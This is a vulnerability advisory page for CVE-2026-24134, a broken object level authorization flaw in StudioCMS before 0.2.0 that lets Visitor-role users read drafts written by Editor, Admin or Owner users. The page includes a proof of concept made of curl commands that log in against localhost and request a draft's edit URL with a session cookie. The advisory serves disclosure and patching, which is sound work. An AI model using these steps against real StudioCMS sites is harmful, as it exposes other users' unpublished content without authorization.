Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-8cw6-53m5-4932

Опубликовано: 27 янв. 2026
Источник: github
Github: Прошло ревью
CVSS3: 6.5

Описание

StudioCMS has Authorization Bypass Through User-Controlled Key

Summary

StudioCMS contains a Broken Object Level Authorization (BOLA) vulnerability in the Content Management feature that allows users with the "Visitor" role to access draft content created by Editor/Admin/Owner users.

Details

The Issue: The endpoint /dashboard/content-management/edit?edit={UUID} validates user authentication but does NOT validate:

  1. User role (should require Editor/Admin/Owner)
  2. Content ownership (should verify the draft belongs to the user)

This allows users with "Visitor" role (lowest privilege) to access draft content created by Editor/Admin/Owner users by directly accessing the edit URL with the content UUID.

PoC

  • User A: Editor role (example username: dummy04)
  • User B: Visitor role (example username: dummy01)

Reproduction Steps:

Step 1 - Create draft as Editor:

  1. Login as User A (Editor role)
  2. Navigate to: http://localhost:4321/dashboard/content-management
  3. Create new content (it will stay as draft)
  4. After saving, note the UUID in the URL:
http://localhost:4321/dashboard/content-management/edit?edit=bad87630-69a4-4cd6-bcb2-6965839dc148

Copy this UUID: bad87630-69a4-4cd6-bcb2-6965839dc148

Step 2 - Access draft as Visitor:

  1. Login as Visitor and get auth_session cookie
curl -X POST "http://127.0.0.1:4321/studiocms_api/auth/login" -F 'username=dummy01' -F 'password=dummy01pass$'
01

  1. Proof of Visitor permission

    02

  2. Access Editor's draft using the UUID

curl "http://127.0.0.1:4321/dashboard/content-management/edit?edit=bad87630-69a4-4cd6-bcb2-6965839dc148" -H "Cookie: auth_session=qvawh6zv23hc2spu6xx7pzgrnn4rpd3q" -v

Result: Returns full HTML page with draft content (200 OK)

Impact

Impact Scenarios:

  1. Information Disclosure:

    • Visitor users can read unpublished drafts containing sensitive information
    • Drafts may contain confidential business information, unreleased announcements, or proprietary content
    • Competitive intelligence could be gathered from draft content

  2. Privacy Violation:

    • Personal notes, work-in-progress content, or internal communications in drafts exposed
    • Violation of content creator privacy expectations

  3. Business Impact:

    • Premature disclosure of marketing campaigns, product launches, or announcements
    • Loss of competitive advantage if draft strategies are exposed
    • Potential compliance issues if drafts contain regulated information

  4. Complete RBAC Bypass:

    • The entire role-based access control system for draft content is bypassed
    • "Visitor" role becomes equivalent to "Editor" for read access to drafts
    • Undermines the trust model of multi-user content management

Ссылки

Пакеты

Наименование

studiocms

npm
Затронутые версииВерсия исправления

< 0.2.0

0.2.0

EPSS

Процентиль: 8%
0.0003
Низкий

6.5 Medium

CVSS3

CVE ID

CVE-2026-24134

Дефекты

CWE-639
CWE-862

Связанные уязвимости

nvd логотип

CVE-2026-24134

CVSS3: 6.5
nvd
10 дней назад

StudioCMS is a server-side-rendered, Astro native, headless content management system. Versions prior to 0.2.0 contain a Broken Object Level Authorization (BOLA) vulnerability in the Content Management feature that allows users with the "Visitor" role to access draft content created by Editor/Admin/Owner users. Version 0.2.0 patches the issue.

EPSS

Процентиль: 8%
0.0003
Низкий

6.5 Medium

CVSS3

CVE ID

CVE-2026-24134

Дефекты

CWE-639
CWE-862